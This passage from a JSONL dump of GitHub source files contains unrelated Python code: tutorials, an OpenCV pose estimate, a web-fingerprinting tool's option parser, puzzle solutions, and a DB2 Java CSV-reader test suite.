'Mary', 'Tom', 'Jack', 'Rose'}\n\nprint(student) # 输出集合,重复的元素被自动去掉\n\n# 成员测试\nif 'Rose' in student :\n print('Rose 在集合中')\nelse :\n print('Rose 不在集合中')\n\n\n# set可以进行集合运算\na = set('abracadabra')\nb = set('alacazam')\n\nprint(a)\n\nprint(a - b) # a 和 b 的差集\n\nprint(a | b) # a 和 b 的并集\n\nprint(a & b) # a 和 b 的交集\n\nprint(a ^ b) # a 和 b 中不同时存在的元素\n\npara_str = \"\"\"这是一个多行字符串的实例\n多行字符串可以使用制表符\nTAB ( \\t )。\n也可以使用换行符 [ \\n ]。\n\"\"\"\nprint(para_str)\n\nname = 'Runoob'\nf'Hello {name}' # 替换变量\n\nf'{1+2}' # 使用表达式\n\nw = {'name': 'Runoob', 'url': 'www.runoob.com'}\nf'{w[\"name\"]}: {w[\"url\"]}'\n","repo_name":"hhggbb/pythonDemo","sub_path":"test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38476416275","text":"import cv2\nimport numpy as np\n\n# Dummy 3D points (replace these with actual 3D points from depth data)\n# For example, you can convert depth values to 3D points using the camera intrinsics\n# For simplicity, assuming Z=1 for all 3D points\nobject_points = np.array([[0, 0, 1],\n [1, 0, 1],\n [0, 1, 1],\n [1, 1, 1]], dtype=np.float32)\n\n# Dummy 2D points (replace these with actual 2D points from feature matching)\n# For example, these can be the keypoints detected in the RGB image\nimage_points = np.array([[10, 10],\n [20, 10],\n [10, 20],\n [20, 20]], dtype=np.float32)\n\n# Dummy camera intrinsic parameters (replace these with actual values)\n# For simplicity, assuming a simple pinhole camera model\nfx, fy = 500, 500 # focal length in pixels\ncx, cy = 320, 240 # principal point in pixels\n\n# Camera matrix\ncamera_matrix = np.array([[fx, 0, cx],\n [0, fy, cy],\n [0, 0, 1]], dtype=np.float32)\n\n# Distortion coefficients (assuming no distortion for simplicity)\ndist_coeffs = np.zeros((4, 1), dtype=np.float32)\n\n# Solve PnP problem to estimate camera pose\nsuccess, rotation_vector, translation_vector = cv2.solvePnP(object_points, image_points, camera_matrix, dist_coeffs)\n\n# Convert rotation vector to rotation matrix\nrotation_matrix, _ = cv2.Rodrigues(rotation_vector)\n\n# Print the estimated rotation matrix and translation vector\nprint(\"Estimated Rotation Matrix:\")\nprint(rotation_matrix)\nprint(\"\\nEstimated Translation Vector:\")\nprint(translation_vector)\n","repo_name":"aidan-pantoya/RowdyRover","sub_path":"SLAM/SLAMpy/cameraEst.py","file_name":"cameraEst.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5472241486","text":"# /usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File : option.py\n@Time : 2021/01/09 17:56:34\n@Author: Morker\n@Blog : https://96.mk/\n@Email : i@96.mk\n\nIf you don't go through the cold, you can't get the fragrant plum blossom.\n'''\n\nimport os\nimport sys\nimport random\nimport prettytable as pt\nfrom mod.fofa import fmain\nfrom mod.zoomeye import zmain\nfrom mod.quake import qmain\nfrom mod.website import mwebs\nfrom mod.rulesCli import ruleMain\nfrom mod.output import outMain\nfrom lib.proxy import checkProxyFile\nfrom lib.update import update\nfrom lib.common import getScheme\nfrom colorama import init as wininit\nfrom config.config import Version, tosayRun, Banner, fofaApi, zoomeyeApi\nfrom config.data import Urls, Paths, WebInfos, OutInfos, Proxys, confs, logger\n\n\ndef initOption(usage, root, args):\n wininit(autoreset=True)\n datas_init()\n set_path(root)\n program_start(usage)\n confs_init()\n add_options(args)\n set_confs()\n runmod()\n\n\ndef add_options(cmdparse):\n if hasattr(cmdparse, \"items\"):\n cmdlines = cmdparse.items()\n else:\n cmdlines = cmdparse.__dict__.items()\n\n for key, value in cmdlines:\n confs[key] = value\n\n\ndef set_path(root):\n Paths.root = root\n Paths.output = os.path.join(root, 'output')\n Paths.config = os.path.join(root, 'config')\n Paths.config_py = os.path.join(Paths.config, 'config.py')\n Paths.proxyFile = os.path.join(root, 'proxyFile')\n\n\ndef program_start(usage):\n print(random.choice(Banner))\n if tosayRun:\n from config.tosay import todaySay\n if todaySay():\n print(todaySay())\n else:\n pass\n if len(sys.argv) == 1:\n print(usage)\n exit(0)\n\n\ndef confs_init():\n confs.version = False\n confs.url = None\n confs.file = None\n confs.ip = None\n confs.web = None\n confs.proxy = None\n confs.proxylist = None\n confs.updateprogram = False\n confs.outputTarget = None\n confs.search = None\n\n\ndef set_confs():\n if confs.updateprogram:\n update()\n if confs.version:\n logger.info(\"Version: {0}\".format(Version))\n exit(0)\n if confs.search:\n searchType = [\"fofa\", \"eye\", \"qk\"]\n if confs.search in set(searchType):\n pass\n else:\n logger.error(\"参数错误,e.g.(-s fofa or -s eye or -s qk)\")\n exit(0)\n if confs.outputTarget:\n outTypes = [\"txt\", \"json\", \"html\", \"xls\", \"csv\"]\n if confs.outputTarget in set(outTypes):\n pass\n else:\n logger.error(\"输出格式错误,只支持输出格式为:{0}\".format(outTypes))\n exit(0)\n if confs.ip:\n Urls.ips.append(confs.ip)\n if confs.url:\n if not confs.url.startswith('http'):\n confs.url = \"http://\" + confs.url\n Urls.url.append(confs.url)\n if confs.file:\n with open(confs.file, 'r') as f:\n for ip in f.readlines():\n if len(ip) != 1:\n Urls.ips.append(ip.strip())\n if confs.web:\n with open(confs.web, 'r') as f:\n for web in f.readlines():\n if len(web) != 1:\n if not web.startswith('http'):\n web = \"http://\" + web\n Urls.url.append(web.strip())\n\n if isinstance(confs[\"proxy\"], str):\n if \":\" in confs[\"proxy\"]:\n splits = confs[\"proxy\"].split(\":\")\n try:\n if int(splits[2]):\n confs[\"proxy\"] = {splits[0]: \"{0}:{1}:{2}\".format(\n splits[0], splits[1], splits[2])}\n Proxys.proxyList.append(confs[\"proxy\"])\n except ValueError:\n logger.error(\n \"代理地址错误,例如:http://127.0.0.1:8080 or https://127.0.0.1:8080\")\n exit(0)\n elif confs[\"proxy\"] != \"all\" and confs[\"proxy\"] != \"cn\":\n logger.error(\n \"参数错误,all表示加载全部IP,cn加载国内IP,自定义例子为:http://127.0.0.1:8080 or https://127.0.0.1:8080\")\n exit(0)\n else:\n checkProxyFile(confs[\"proxy\"])\n if len(Proxys.proxyList) == 0:\n logger.error(\"本地获取代理失败,请从新获取\")\n message = input(\"是否不使用代理访问?[y/N]\")\n if message != \"y\":\n exit(0)\n else:\n logger.info(\"分配IP中\")\n getScheme()\n if confs.proxylist:\n if confs.proxylist == \"all\" or confs.proxylist == \"cn\":\n checkProxyFile(confs.proxylist)\n if len(Proxys.proxyList) == 0:\n logger.error(\"本地获取代理失败,请重新获取\")\n exit(0)\n else:\n tb = pt.PrettyTable()\n tb.field_names = ['Protocol', 'Host']\n for p in Proxys.proxyList:\n logger.info(p)\n for i in p:\n tb.add_row([i, p[i]])\n print(tb)\n logger.info(\"协议可切换,一般在代理插件里设置http协议,这样避免证书问题\")\n else:\n exit(0)\n\n\ndef runmod():\n if Urls.ips:\n if confs.search:\n if confs.search == \"fofa\":\n logger.info(\"调用Fofa接口中\")\n fmain(Urls.ips)\n if confs.search == \"eye\":\n logger.info(\"调用Zoomeye接口中\")\n zmain(Urls.ips)\n if confs.search == \"qk\":\n logger.info(\"调用Quake接口中\")\n qmain(Urls.ips)\n else:\n logger.error(\"参数错误,e.g.(-s fofa or -s eye or -s qk)\")\n exit(0)\n if Urls.url:\n mwebs()\n if WebInfos:\n ruleMain()\n else:\n logger.info(\"获取信息失败\")\n if OutInfos:\n if confs.outputTarget:\n outMain(confs.outputTarget)\n else:\n outMain(\"txt\")\n\n\ndef datas_init():\n Urls.url = []\n Urls.ips = []\n Urls.scheme = []\n Proxys.proxyList = []\n Proxys.scheme = []\n WebInfos = {}\n OutInfos = {}\n","repo_name":"s7ckTeam/Glass","sub_path":"lib/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":897,"dataset":"github-code","pt":"53"} +{"seq_id":"20151084491","text":"from __future__ import annotations\nfrom functools import partial\nfrom typing import Dict, List, Optional, Tuple\n\nfrom .utils import load_rows, split_row\n\nORBIT_MAP: Dict[str, O] = {}\n\n\nclass O:\n def __init__(self, name: str, direct_orbits: List[O]) -> None:\n self.name = name\n self.direct_orbits = direct_orbits\n self.orbittors: List[O] = []\n\n def __repr__(self) -> str:\n return self.name\n\n def orbit(self, o: O) -> None:\n self.direct_orbits.append(o)\n o.orbittors.append(self)\n\n @property\n def indirect_orbits(self) -> List[O]:\n return [\n orbits\n for neighbour in self.direct_orbits\n for orbits in neighbour.all_orbits\n ]\n\n @property\n def indirect_orbittors(self) -> List[O]:\n return [\n orbits for neighbour in self.orbittors for orbits in neighbour.all_orbittors\n ]\n\n @property\n def all_orbits(self) -> List[O]:\n return [*self.direct_orbits, *self.indirect_orbits]\n\n @property\n def all_orbittors(self) -> List[O]:\n return [*self.orbittors, *self.indirect_orbittors]\n\n\ndef process(input_list: List[str]) -> None:\n for inp in input_list:\n a, b = inp.strip(\"\\n\").split(\")\")\n if a not in ORBIT_MAP:\n ORBIT_MAP[a] = O(a, [])\n if b not in ORBIT_MAP:\n ORBIT_MAP[b] = O(b, [])\n ORBIT_MAP[b].orbit(ORBIT_MAP[a])\n\n\ndef find_path(a: O, b: O, visitors: Optional[List[O]] = None) -> Tuple[int, bool]:\n if visitors is None:\n visitors = []\n visitors.append(a)\n if b in a.direct_orbits or b in a.orbittors:\n return 0, True\n for neighbour in [*a.direct_orbits, *a.orbittors]:\n if neighbour in visitors:\n continue\n path = find_path(neighbour, b, visitors)\n if path[1]:\n return path[0] + 1, True\n return 0, False\n\n\nif __name__ == \"__main__\":\n ex_data = load_rows(\"ex6.in\", str)\n data = load_rows(\"day6.in\", str)\n\n process(ex_data)\n assert len(ORBIT_MAP[\"D\"].all_orbits) == 3\n assert len(ORBIT_MAP[\"L\"].all_orbits) == 7\n assert len(ORBIT_MAP[\"COM\"].all_orbits) == 0\n assert find_path(ORBIT_MAP[\"COM\"], ORBIT_MAP[\"H\"]) == (2, True)\n\n ORBIT_MAP = {}\n process(data)\n print(sum(len(orbit.all_orbits) for orbit in ORBIT_MAP.values()))\n print(find_path(ORBIT_MAP[\"SAN\"], ORBIT_MAP[\"YOU\"])[0] - 1)\n","repo_name":"Kruptein/AdventOfCode2019","sub_path":"aoc/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74364423206","text":"from src.conf.configuration import *\nimport pandas as pd\nimport csv\ndef load_args_me():\n args_argument_map={}\n path_df_arguments_preprocessed = get_preprocessed_path('args-me')\n dataframe_arguments = pd.read_csv(path_df_arguments_preprocessed,encoding=\"utf-8\",quotechar='\"',sep=\"|\",quoting=csv.QUOTE_ALL).dropna()\n conclusions = list(dataframe_arguments['conclusion'])\n premises = list(dataframe_arguments['premise'])\n ids = list(dataframe_arguments['argument_id'])\n\n for i,conclusion in enumerate(conclusions):\n\n premise = premises[i]\n argument= premise\n id = ids[i]\n args_argument_map[id] = argument\n return args_argument_map\n\ndef load_old_arguments():\n old_arguments_path = get_old_arguments_path()\n arguments_df = pd.read_csv(old_arguments_path)\n\n premises = list(arguments_df['Premise'])\n argument_id = list(arguments_df['Argument ID'])\n discussion_id = list(arguments_df['Discussion ID'])\n old_argument_map = {}\n for i,premise in enumerate(premises):\n\n\n argument = premise\n id = str(argument_id[i]) +\" \"+ str(discussion_id[i])\n old_argument_map[id]= argument\n return old_argument_map\n\ndef load_matches(matches_file):\n matches_file=open(matches_file,'r')\n args_me_argument_ids=[]\n old_argument_ids= []\n for line in matches_file:\n ids= line.split(\"\\t\")\n old_argument_id = ids[1].strip()\n args_me_argument_id = ids[0].strip()\n args_me_argument_ids.append(args_me_argument_id)\n old_argument_ids.append(old_argument_id)\n return zip(args_me_argument_ids,old_argument_ids)\n\ndef search_and_save_matches(path_matches_file, path_results, args_argument_map, old_argument_map):\n matches = load_matches(path_matches_file)\n matched_arguments_file = open(path_results, 'w')\n for args_me_argument_id, old_argument_id in matches:\n if old_argument_id == '-1':\n continue\n args_argument = args_argument_map[args_me_argument_id]\n old_argument = old_argument_map[old_argument_id]\n print(args_argument+\"\\n++++++++++++++++++++++\\n\"+old_argument+\"\\n\")\n matched_arguments_file.write(args_argument+\"\\n\"+old_argument+\"\\n\")\n matched_arguments_file.write(\"=================\\n\")\n\nold_argument_map = load_old_arguments()\nargs_argument_map = load_args_me()\nsearch_and_save_matches('/mnt/disk1/args-me-matching/lukas-argument-best-matches.txt','/mnt/disk1/args-me-matching/argument-best-matches.txt',args_argument_map,old_argument_map)\n\n","repo_name":"YamenAjjour/document-matching","sub_path":"archive/search_and_save_matches.py","file_name":"search_and_save_matches.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13884694561","text":"\nimport sys\nimport os\nimport ibm_db\nimport platform\nfrom texttable import Texttable\nfrom . import CommonTestCase\nfrom utils import mylog\nfrom multiprocessing import Value\nfrom ctypes import c_bool\nimport spclient_python\n\n__all__ = ['JavaRead_CSV']\n\nexecute_once = Value(c_bool, False)\n\nclass JavaRead_CSV(CommonTestCase):\n\n def __init__(self, test_name, extra_arg=None):\n super(JavaRead_CSV, self).__init__(test_name, extra_arg)\n self.rest_CSVREAD_found = False\n\n def runTest(self):\n super(JavaRead_CSV, self).runTest()\n if self.mDb2_Cli is None:\n return\n with execute_once.get_lock():\n if execute_once.value:\n mylog.debug(\"we already ran\")\n return\n execute_once.value = True\n self.filename = \"sp500_pcln_options.csv\"\n self.EXTBL_LOCATION = \"\"\n self.found = False\n self.send_file_error = False\n #self.test_unregister_java_jar_csv_by_storeproc()\n self.test_register_java_jar_csv_by_storeproc()\n self.test_register_java_csv_functions()\n self.test_send_sp500_pcln_options_csv()\n self.test_CSVREAD_present()\n self.test_use_java_csvRead()\n self.test_use_java_csvRead2()\n\n def setUp(self):\n super(JavaRead_CSV, self).setUp()\n mylog.debug(\"setUp\")\n\n def tearDown(self):\n super(JavaRead_CSV, self).tearDown()\n mylog.debug(\"tearDown\")\n\n def test_register_java_csv_functions(self):\n sql_str = \"\"\"\nCREATE OR REPLACE FUNCTION \n \"{schema}\".JAVA_CSVREAD(VARCHAR(255))\nRETURNS GENERIC TABLE\nEXTERNAL NAME 'UDFcsvReader!csvReadString'\nLANGUAGE JAVA\nSPECIFIC java_csvReadString\nPARAMETER STYLE DB2GENERAL\nVARIANT\nFENCED THREADSAFE\nNOT NULL CALL\nNO SQL\nNO EXTERNAL ACTION\nNO SCRATCHPAD\nNO FINAL CALL\nDISALLOW PARALLEL\nNO DBINFO\n@\n\nCREATE OR REPLACE FUNCTION \n \"{schema}\".JAVA_CSVREAD(\n VARCHAR(255),\n VARCHAR(255)\n )\nRETURNS GENERIC TABLE\nEXTERNAL NAME 'UDFcsvReader!csvRead'\nLANGUAGE JAVA\nSPECIFIC java_csvRead\nPARAMETER STYLE DB2GENERAL\nVARIANT\nFENCED THREADSAFE\nNOT NULL CALL\nNO SQL\nNO EXTERNAL ACTION\nNO SCRATCHPAD\nNO FINAL CALL\nDISALLOW PARALLEL\nNO DBINFO\n@\n\"\"\".format(schema = self.getDB2_USER())\n try:\n _ret = self.run_statement(sql_str)\n except Exception as i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n '''\n def test_unregister_java_jar_csv(self):\n try:\n cmds = ['db2 connect to sample',\n \"\"\"db2 \"CALL sqlj.remove_jar('%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER(),\n 'db2 terminate']\n self.call_cmd(cmds)\n\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n '''\n def test_unregister_java_jar_csv_by_storeproc(self):\n sql_str = \"\"\"CALL sqlj.remove_jar('%s.MY_CSV_READER_JAR')\"\"\" % self.getDB2_USER()\n mylog.info(\"executing \\n%s\\n\" % sql_str)\n try:\n stmt1 = ibm_db.callproc(self.conn, \"sqlj.remove_jar\", ('%s.MY_CSV_READER_JAR' % self.getDB2_USER(),))\n ibm_db.free_stmt(stmt1)\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n return 0\n\n def try_to_replace(self): \n try:\n sql_str = \"\"\"CALL sqlj.DB2_REPLACE_JAR('file:jar/restUDF.jar', '%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER()\n mylog.info(\"executing \\n%s\\n\" % sql_str)\n with open (\"jar/UDFcsvReader.jar\", \"rb\") as io_jar_blob:\n jar_blob = io_jar_blob.read()\n jar_id = '\"%s\".\"MY_CSV_READER_JAR\"' % self.getDB2_USER()\n stmt1 = ibm_db.prepare(self.conn, \"CALL sqlj.DB2_REPLACE_JAR (?,?)\")\n #self.mDb2_Cli.describe_parameters(stmt1)\n ibm_db.bind_param(stmt1, 1, jar_blob, ibm_db.SQL_PARAM_INPUT, ibm_db.SQL_BLOB)\n ibm_db.bind_param(stmt1, 2, jar_id)\n ret = ibm_db.execute(stmt1)\n\n ibm_db.free_stmt(stmt1)\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n def get_EXTBL_LOCATION(self):\n sql_str = \"\"\"\nSELECT \n VALUE\nFROM\n SYSIBMADM.DBCFG\nWHERE\n UPPER(NAME) = 'EXTBL_LOCATION'\n\"\"\" \n stmt = ibm_db.exec_immediate(self.conn, sql_str)\n dictionary = ibm_db.fetch_both(stmt)\n mylog.info(\"%s\" % dictionary)\n if dictionary:\n self.EXTBL_LOCATION = dictionary['VALUE']\n ibm_db.free_result(stmt)\n\n def get_tmp(self):\n if self.server_info.DBMS_NAME == \"DB2/NT64\":\n tmp_dir = os.getenv(\"TMP\", r\"c:\\tmp\\\\\")\n if not tmp_dir.endswith(\"\\\\\"):\n tmp_dir += \"\\\\\"\n else:\n self.get_EXTBL_LOCATION()\n tmp_dir = self.EXTBL_LOCATION\n return tmp_dir\n\n def test_file_presnt_on_host_fs(self):\n sql_str = \"\"\"\nCREATE OR REPLACE PROCEDURE FIND_FILE(\nIN filename VARCHAR(200),\nOUT found SMALLINT)\nBEGIN\n DECLARE v_filehandle UTL_FILE.FILE_TYPE;\n DECLARE isOpen BOOLEAN;\n DECLARE v_dirAlias VARCHAR(50) DEFAULT 'mydir';\n DECLARE v_filename VARCHAR(200) DEFAULT 'myfile.csv'; \n set found = -1;\n CALL UTL_DIR.CREATE_OR_REPLACE_DIRECTORY('mydir', '{_dir}');\n SET v_filename = filename;\n SET v_filehandle = UTL_FILE.FOPEN(v_dirAlias,v_filename, 'r');\n SET isOpen = UTL_FILE.IS_OPEN( v_filehandle );\n set found = 0;\n IF isOpen != TRUE THEN\n set found = -1;\n END IF;\n CALL UTL_FILE.FCLOSE(v_filehandle);\nEND\n@\n\"\"\"\n _dir = self.get_tmp()\n\n sql_str = sql_str.format(_dir=_dir)\n mylog.info(sql_str)\n\n self.run_statement(sql_str)\n try:\n stmt1 = ibm_db.prepare(self.conn, \"CALL FIND_FILE (?,?)\")\n self.mDb2_Cli.describe_parameters(stmt1)\n filename = self.filename\n out_found = 0\n ibm_db.bind_param(stmt1, 1, filename, ibm_db.SQL_PARAM_INPUT)\n ibm_db.bind_param(stmt1, 2, out_found, ibm_db.SQL_PARAM_OUTPUT, ibm_db.SQL_SMALLINT)\n _ret = ibm_db.execute(stmt1)\n mylog.info(\"%s\" % _ret)\n mylog.info(\"out_found %s\" % out_found)\n if out_found == 0:\n self.found = True\n else:\n self.found = False\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info())\n return -1\n return 0\n\n def test_register_java_jar_csv_by_storeproc(self):\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.info(\"DB2 mac doesnt supprt Java\")\n return 0\n\n try:\n sql_str = \"\"\"CALL sqlj.db2_install_jar('file:jar/UDFcsvReader.jar', '%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER()\n mylog.info(\"executing \\n%s\\n\" % sql_str)\n with open (\"jar/UDFcsvReader.jar\", \"rb\") as io_jar_blob:\n jar_blob = io_jar_blob.read()\n jar_id = '\"%s\".\"MY_CSV_READER_JAR\"' % self.getDB2_USER()\n stmt1 = ibm_db.prepare(self.conn, \"CALL sqlj.db2_install_jar (?,?)\")\n #self.mDb2_Cli.describe_parameters(stmt1)\n ibm_db.bind_param(stmt1, 1, jar_blob, ibm_db.SQL_PARAM_INPUT, ibm_db.SQL_BLOB)\n ibm_db.bind_param(stmt1, 2, jar_id)\n ret = ibm_db.execute(stmt1)\n\n ibm_db.free_stmt(stmt1)\n except Exception as _i:\n if \"SQL20201N \" in str(_i):\n ret = self.try_to_replace()\n if ret == 0:\n return 0\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n\n '''\n def test_register_java_jar_csv(self):\n\n try:\n cmds = ['db2 connect to sample',\n \"\"\"db2 \"CALL sqlj.install_jar('file:jar/UDFcsvReader.jar', '%s.MY_CSV_READER_JAR')\" \"\"\" % self.getDB2_USER(),\n 'db2 terminate']\n self.call_cmd(cmds)\n\n except Exception as _i:\n self.result.addFailure(self, sys.exc_info()) \n return -1\n\n return 0\n '''\n def test_CSVREAD_present(self):\n \"\"\"\n \"\"\"\n self.rest_CSVREAD_found = self.if_routine_present(self.getDB2_USER(), \"JAVA_CSVREAD\")\n\n if not self.rest_CSVREAD_found:\n mylog.warning(\"UDF 'JAVA_CSVREAD' not present\")\n\n return 0\n\n def test_send_sp500_pcln_options_csv(self):\n \"\"\"I send the local file sp500_pcln_options.csv to the temp where DB2 is running...on the cloud ?\n local DB2 ? docker DB2 ?\n \"\"\"\n try:\n sql_str = \"\"\"\nDROP TABLE TEMP_CSV\n@\"\"\"\n if self.if_table_present(self.conn, \"TEMP_CSV\", self.getDB2_USER() ):\n self.run_statement(sql_str)\n\n file_to_read_path = os.path.join(os.getcwd(), self.filename)\n _dir, _name = os.path.split(file_to_read_path)\n spclient_python.send_file(self.conn, file_to_read_path, _name, mylog.info)\n\n stmt, name = ibm_db.callproc(self.conn, 'PROC_RENAME_FILE_LOCAL_FS', (_name, ))\n #mylog.debug(\"stmt %s\" % stmt)\n #mylog.info(\"name '%s'\" % name)\n if stmt is not None:\n mylog.info(\"Values of bound parameters _after_ CALL: '%s'\" % name)\n ibm_db.free_stmt(stmt)\n\n\n except Exception as _i:\n mylog.error(\"\\n%s %s\" % (type(_i), _i))\n self.send_file_error = True\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n def test_use_java_csvRead(self):\n \"\"\"Read sp500_pcln_options.csv using Java Table Function JAVA_CSVREAD\n this function is located under /jar/UDFcsvReader.jar\n the source code for UDFcsvReader.jar is under sqllib/samples/jdbc\n 'UDFcsvReader!csvReadString'\n \"\"\"\n\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.info(\"DB2 mac doesnt supprt Java\")\n return 0\n mylog.info(\"test_use_java_csvRead read JAVA_CSVREAD\")\n try:\n if self.send_file_error:\n mylog.warning(\"could not send csv file\")\n return 0\n\n self.set_file_to_read()\n\n exec_str = \"\"\"\nselect \n * \nfrom \n table(JAVA_CSVREAD('%s')) as TX ( \nStrike FLOAT,\nExpiry date,\nType varchar(10),\nSymbol varchar(30),\nLast FLOAT,\nBid FLOAT,\nAsk FLOAT,\nChg FLOAT,\nPctChg FLOAT,\nVol bigint, \nOpen_Int bigint,\nIV double,\nRoot varchar(30),\nIsNonstandard varchar(30),\nUnderlying varchar(30),\nUnderlying_Price float, \nQuote_Time timestamp, \nLast_Trade_Date timestamp)\n\"\"\" % self.file_to_read\n mylog.info(\"executing \\n%s\\n \" % exec_str)\n\n if not self.if_routine_present(self.getDB2_USER(), \"JAVA_CSVREAD\"):\n mylog.error(\"function 'JAVA_CSVREAD' not present\")\n self.fail(\"function 'JAVA_CSVREAD' not present\")\n return -1\n\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.warning(\"db2 10.1 on mac doesnt support java\")\n\n self.test_file_presnt_on_host_fs()\n if not self.found:\n mylog.warning(\"file is not presnt in the local fs %s..so this test will fail\" % self.file_to_read)\n return 0\n\n stmt1 = ibm_db.exec_immediate(self.conn, exec_str)\n self.mDb2_Cli.describe_columns(stmt1)\n\n dictionary = ibm_db.fetch_both(stmt1)\n #if dictionary:\n # mylog.info(\"dictionary keys %s\" % dictionary.keys())\n table = Texttable()\n table.set_deco(Texttable.HEADER)\n str_header = \"STRIKE Expiry Type Symbol Last Bid Ask Chg PctChg Vol Open_Int iv root IsNonstandard Underlying Underlying_Price Quote_Time Last_Trade_Date\"\n str_header = str_header.upper()\n header_list = str_header.split()\n table.header(header_list)\n table.set_cols_width([10, 22, 6, 30, 9, 9, 12, 10, 10, 8, 9, 12, 11,8, 11, 22, 21, 21])\n table.set_header_align(['l ' for _i in header_list])\n cont_rows = 0 \n while dictionary:\n my_row = []\n if cont_rows < 10:\n for column in header_list:\n my_row.append(dictionary[column])\n table.add_row(my_row)\n dictionary = ibm_db.fetch_both(stmt1)\n mylog.info(\"\\n%s\\n\" % table.draw())\n ibm_db.free_result(stmt1)\n\n except Exception as i:\n \n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n self.result.addExpectedFailure(self, sys.exc_info())\n mylog.warning(\"Mac doesn't have jdk db2 10.1 working\")\n mylog.warning(\"%s\" % i)\n return 0\n\n self.result.addFailure(self, sys.exc_info())\n return -1\n\n return 0\n\n def set_file_to_read(self):\n _dir = self.get_tmp()\n\n self.file_to_read = os.path.join(_dir, self.filename)\n\n def test_use_java_csvRead2(self):\n \"\"\"Read sp500_pcln_options.csv using Java Table Function JAVA_CSVREAD\n this function is located under /jar/UDFcsvReader.jar\n the source code for UDFcsvReader.jar is under sqllib/samples/jdbc\n 'UDFcsvReader!csvRead'\n \"\"\"\n if self.server_info.DBMS_NAME == \"DB2/DARWIN\":\n mylog.info(\"DB2 mac doesnt supprt Java\")\n return 0\n\n if self.send_file_error:\n mylog.warning(\"could not send csv file\")\n return 0\n\n list_fields = \"REAL, _DATE, VARCHAR, VARCHAR, real, real, real, real, real, bigInt, bigInt, double, varchar, varchar, varchar, real, _TIMESTAMP, _TIMESTAMP\"\n #list_fields = \"REAL, _DATE\"\n try:\n #file_to_read = os.path.join(os.getcwd(), \"sp500_pcln_options.csv\")\n self.set_file_to_read()\n\n exec_str = \"\"\"\nselect * from table(\n JAVA_CSVREAD(\n '%s',\n '%s')\n ) \n\nas some_table ( \n\"Strike hello\" real,\nExpiry date,\nType varchar(5),\nSymbol varchar(30),\nLast real,\nBid real,\nAsk real,\nChg real,\nPctChg real,\nVol bigint, \nOpen_Int bigint,\nIV double,\nRoot varchar(10),\nIsNonstandard varchar(10),\nUnderlying varchar(10),\nUnderlying_Price real, \nQuote_Time timestamp, \nLast_Trade_Date timestamp)\n\n\"\"\" % (self.file_to_read, list_fields)\n\n self.test_file_presnt_on_host_fs()\n if not self.found:\n mylog.warning(\"file is not presnt in the local fs %s..so this test will fail\" % self.file_to_read)\n return 0\n mylog.info(\"executing \\n%s\\n\" % exec_str)\n stmt1 = ibm_db.exec_immediate(self.conn, exec_str)\n self.mDb2_Cli.describe_columns(stmt1)\n\n dictionary = ibm_db.fetch_both(stmt1)\n #if dictionary:\n # mylog.info(\"dictionary keys %s\" % dictionary.keys())\n table = Texttable()\n table.set_deco(Texttable.HEADER)\n str_header = \"STRIKE Expiry Type Symbol Last Bid Ask Chg PctChg Vol Open_Int iv root IsNonstandard Underlying Underlying_Price Quote_Time Last_Trade_Date\"\n str_header = str_header.upper()\n header_list = str_header.split()\n size_list = [10, 20, 6, 30, 9, 9, 12, 10, 10, 8, 9, 12, 11,8, 11, 22, 21, 21]\n\n if self.mDb2_Cli.describe_cols:\n names_header = []\n for some_dic in self.mDb2_Cli.describe_cols:\n names_header.append(some_dic['name'])\n #size_list.append(20)\n table.header(names_header)\n\n else:\n table.header(header_list)\n\n table.set_cols_width(size_list)\n table.set_header_align(['l ' for _i in header_list])\n\n while dictionary:\n my_row = []\n cont = 0\n for _column in header_list:\n my_row.append(dictionary[cont])\n #my_row.append(dictionary[column])\n cont += 1\n table.add_row(my_row)\n dictionary = ibm_db.fetch_both(stmt1)\n mylog.info(\"\\n%s\\n\\n\" % table.draw())\n ibm_db.free_result(stmt1)\n except Exception as _i:\n self.result.addFailure(self,sys.exc_info())\n return -1\n\n return 0\n\n","repo_name":"asierra01/ibm_db_test","sub_path":"ibm_db_test_cases/ibm_db_JAVA_CSVREAD.py","file_name":"ibm_db_JAVA_CSVREAD.py","file_ext":"py","file_size_in_byte":16722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38733634118","text":"# Sprawdzaj, czy podany string zawiera ciąg dowolnych małych liter rozdzielonych znakiem _, np. aab_cbbbc\n\nimport re\n\nplik = open('txt.txt', 'r', encoding='utf8')\n\ntxt = plik.read()\n\nif re.search(r\"[(\\D{1,})\\_(\\D{1,})]\", txt):\n print('zawiera')\nelse:\n print('nie')","repo_name":"KDebowiec/DevsMentoring","sub_path":"rozszerzenie/ReGex/regex3.py","file_name":"regex3.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32837269792","text":"import gensim\nimport gensim.downloader as api\nimport keras\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import 